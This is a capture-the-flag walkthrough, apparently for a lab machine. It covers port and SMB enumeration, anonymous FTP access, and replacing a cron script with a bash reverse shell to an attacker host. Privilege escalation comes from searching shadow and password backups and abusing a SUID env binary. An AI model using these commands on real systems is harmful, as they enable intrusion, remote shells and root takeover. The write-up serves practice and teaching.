[Enumeration]
- Port Scan
nmap -Pn <ip>There’re 4 ports: 21,22,139, and 445.
2. OS and service scan
nmap -A -p 21,22,139,445 <ip>There’s anonymous login on FTP.
3. Vuln scan
nmap --script vuln -p 21,22,139,445 <ip>Nothing
4. Samba scan
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse <ip>There’s anonymous access with /pics.
[Exploitation]
- Connect FTP
ftp <ip>
lsThere’s /scripts.
cd scripts
Download all files
get clean.shget removed_files.logget to_do.txt
2. Read each files
cat clean.shThis may be a cron job.
cat removed_files.log
cat to_do.txt
3. Get reverse shell
Prepare reverse shell and save as “clean.sh”
#!/bin/bash
/bin/bash -c 'bash -i >& /dev/tcp/<attacker ip>/<attacker port> 0>&1'
Connect to FTP and Replace clean.sh
ftp <ip>cd scriptsput clean.sh clean.sh
Create listener, wait about a minute.
nc -lvp <attacker port>
ls -la
cat user.txt
[Privilege escalation]
- Search for ssh keys
find / -name authorized_keys 2> /dev/nullNothing
find / -name id_rsa 2> /dev/nullNothing
2. Search for password
Search for shadow files.
find / 2>>/dev/null | grep "shadow"
Read shadow.bak
cat /var/backups/shadow.bak
Search for pass files.
find / 2>>/dev/null | grep -i "pass"
Read passwd.bak
cat /var/backups/pass.bak
3. Verify permission of passwd and shadow
Verify permission of /etc/passwd
ls -la /etc/passwdI cannot edit it.
cat /etc/passwdThere’re 2 users: root and namelessone.
Verify permission of /etc/shadow
ls -la /etc/shadowI cannot read it.
4. Verify history
historyNot much useful
5. Verify sudo
sudo -lNo TTY shell
Import TTY shell
python -c 'import pty;pty.spawn("/bin/bash");'
sudo -lI need password which I don’t have it.
6. Verify SUID and SGID
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
There’s env
Follow GTFObin
env /bin/sh -p
whoami
cd /rootlscat root.txt
